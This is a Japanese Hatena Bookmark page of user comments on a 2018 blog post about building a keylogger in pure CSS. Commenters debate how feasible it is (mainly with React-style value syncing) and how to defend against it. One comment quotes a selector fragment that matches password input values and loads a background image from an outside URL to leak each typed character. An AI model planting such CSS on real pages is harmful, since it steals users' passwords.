• はてなブックマーク
  • テクノロジー
  • CSSだけでキーロガーを作る(※追記あり) - R42日記
  • Twitterでシェア
  • Facebookでシェア

CSSだけでキーロガーを作る(※追記あり) - R42日記

テクノロジー カテゴリーの変更を依頼 記事元:takahashikzn.root42.jp
適切な情報に変更
348 usersがブックマーク コメント43
    共有

    • 記事へのコメント43

    • 注目コメント
    • 新着コメント
    その他
    teppeis
    teppeis 同じアイデアは既にweb fontで実現されてたし、3rd party cssの危険性が急に上がったわけではない / この攻撃はattributeを変更するReact等特定ライブラリ上しか動かない / https://jakearchibald.com/2018/third-party-css-is-not-safe/

    2018/02/28 リンク

    その他
    danhox
    danhox JSだけじゃなくCSSもoffしてブラウズする日が遂に

    2018/02/28 リンク

    その他
    noonworks
    noonworks 悪意のCSSを外部から注入できる状況というとブラウザ拡張かページの改竄が思いつくけど、どちらもCSSに拘る必要がないので、使い所が思いつかない……JS不可CSS可のCMSに埋め込むとか?

    2018/02/28 リンク

    その他
    kotatsuhal
    kotatsuhal Reactとかじゃないと効かないんじゃなかったけ。ノーマルなパスワードinput要素は対策済みでは。

    2018/02/28 リンク

    その他
    kachikachi2
    kachikachi2 a:visitedにbackground-imageを指定してサーバーログで訪問済みか判別するやつもあったね

    2018/02/28 リンク

    その他
    Fushihara
    Fushihara またcssが不便になる

    2018/02/28 リンク

    その他
    dikn
    dikn background-imageって実際に適応されないかぎり呼び出されないんだな 気楽だ

    2018/02/28 リンク

    その他
    rryu
    rryu 普通は入力したものが即座にvalue属性に反映されたりしないから大丈夫なのか。

    2018/02/28 リンク

    その他
    hapilaki
    hapilaki これに関しては、CSSをブロックせずとも画像表示をブロックしてアクセスすれば対策できるんじゃないかな、知らんけど。

    2018/02/28 リンク

    その他
    cartman0
    cartman0 value attributeはinputの初期値で、入力値はvalue propertyで管理されるから結局cssじゃ見えないのね

    2018/03/31 リンク

    その他
    Dai_Kamijo
    Dai_Kamijo “CSSだけでキーロガーを作る - R42日記” — 徳丸 浩 (@ockeghem) February 27, 2018 from Twitter https://twitter.com/Dai_Kamijo March 02, 2018 at 05:29PM via IFTTT

    2018/03/02 リンク

    その他
    takryou79
    takryou79 CSS

    2018/03/01 リンク

    その他
    hinaloe
    hinaloe あー最初出てきた記事で特定のライブラリ〜〜って何の話かとおもったけどなるほどReactでは起こりえてもvueだと普通は発生しないってことか〜〜

    2018/02/28 リンク

    その他
    flying-cat
    flying-cat Reactやないか

    2018/02/28 リンク

    その他
    sgo2
    sgo2 カーソルキーで入力位置を変えながら入力すれば防げるような。(Keepassにはそうやって入力する機能がある)

    2018/02/28 リンク

    その他
    takuya_1st
    takuya_1st CSS で *[value] 取れたのか。。。その仕様はあぶないし、コピペ禁止はかえって危険で間違ってない。コピペ禁止フォーム滅びろ

    2018/02/28 リンク

    その他
    suquiya0
    suquiya0 いろんなテクニックがあるものだ。

    2018/02/28 リンク

    その他
    yuki_2021
    yuki_2021 いろんなことを考えるもんだ

    2018/02/28 リンク

    その他
    lbtmplz
    lbtmplz フェーン

    2018/02/28 リンク

    その他
    teihengrammer
    teihengrammer こええなこれ・・・

    2018/02/28 リンク

    その他
    rryu
    rryu 普通は入力したものが即座にvalue属性に反映されたりしないから大丈夫なのか。

    2018/02/28 リンク

    その他
    kibitaki
    kibitaki わあ。ギミックだ。

    2018/02/28 リンク

    その他
    lifeisadog
    lifeisadog ソースのサイトが言ってるのは「Third party CSS」は安全ではない、つまり外部サイトのCSS(画像やJSも)を安全だと仮定するのは危険、と言ってるだけ。

    2018/02/28 リンク

    その他
    Cherenkov
    Cherenkov React等 key logger キーロガー input[type="password"][value$="a"] { background-image: url("http://example.com/a")

    2018/02/28 リンク

    その他
    diveintounlimit
    diveintounlimit 今はどうなってるか知らないけど、以前はCSS経由のアクセスはキャッシュされなくて同じ文字をタイプしてもログできたよ。

    2018/02/28 リンク

    その他
    taguch1
    taguch1 ほーー。いろんなこと考えるなぁ

    2018/02/28 リンク

    その他
    hapilaki
    hapilaki これに関しては、CSSをブロックせずとも画像表示をブロックしてアクセスすれば対策できるんじゃないかな、知らんけど。

    2018/02/28 リンク

    その他
    ledsun
    ledsun reactでvalue値を毎回属性に反映したい(vdomとdomを乖離させたくない)気持ちはわかる。常にvalueを連動させる必要があるかどうかは謎。不要ならvalueだけ特別扱いすればいいのよね。

    2018/02/28 リンク

    その他
    motchang
    motchang ブコメ

    2018/02/28 リンク

    その他
    manabou
    manabou ][security][keylogger]

    2018/02/28 リンク

    その他
    sky-graph
    sky-graph キャッシュが効くとしても、使用文字の種類は知られてしまいそうだ。ブラウザの非アクティブなタブだと動作しないのかな

    2018/02/28 リンク

    その他
    yoshikidz
    yoshikidz ちょい無理がありそうで逆に良かった感

    2018/02/28 リンク

    その他
    THAL
    THAL 実際使えるかどうかは別として面白いアプローチ

    2018/02/28 リンク

    その他
    YarmUI
    YarmUI Service Workersとセットで使えば・・・

    2018/02/28 リンク

    その他
    teppeis
    teppeis 同じアイデアは既にweb fontで実現されてたし、3rd party cssの危険性が急に上がったわけではない / この攻撃はattributeを変更するReact等特定ライブラリ上しか動かない / https://jakearchibald.com/2018/third-party-css-is-not-safe/

    2018/02/28 リンク

    その他
    noonworks
    noonworks 悪意のCSSを外部から注入できる状況というとブラウザ拡張かページの改竄が思いつくけど、どちらもCSSに拘る必要がないので、使い所が思いつかない……JS不可CSS可のCMSに埋め込むとか?

    2018/02/28 リンク

    その他
    kotatsuhal
    kotatsuhal Reactとかじゃないと効かないんじゃなかったけ。ノーマルなパスワードinput要素は対策済みでは。

    2018/02/28 リンク

    その他
    strategy-pm
    strategy-pm あたまいい。利用者側としては、二度三度PWをわざと間違えるという運用を求められるわけか…もう全部生体認証にするしかないで。

    2018/02/28 リンク

    その他
    hiby
    hiby キーを連打したらBANとかブラウザゲーで実装できそうだなこれ。

    2018/02/28 リンク

    その他

    注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています

    アプリのスクリーンショット
    いまの話題をアプリでチェック!
    • バナー広告なし
    • ミュート機能あり
    • ダークモード搭載
    アプリをダウンロード

    関連記事

    CSSだけでキーロガーを作る(※追記あり) - R42日記

    github.com よくもまあこんなこと思いついたなw 要するに、 input[type="password"][value$="a"] { back...

    ブックマークしたユーザー

    すべてのユーザーの
    詳細を表示します

    同じサイトの新着

    同じサイトの新着をもっと読む

    いま人気の記事

    いま人気の記事をもっと読む

    いま人気の記事 - テクノロジー

    いま人気の記事 - テクノロジーをもっと読む

    新着記事 - テクノロジー

    新着記事 - テクノロジーをもっと読む

    同時期にブックマークされた記事

    はてなブックマーク

    公式Twitter

    はてなのサービス

    • App Storeからダウンロード
    • Google Playで手に入れよう
    Copyright © 2005-2024 Hatena. All Rights Reserved.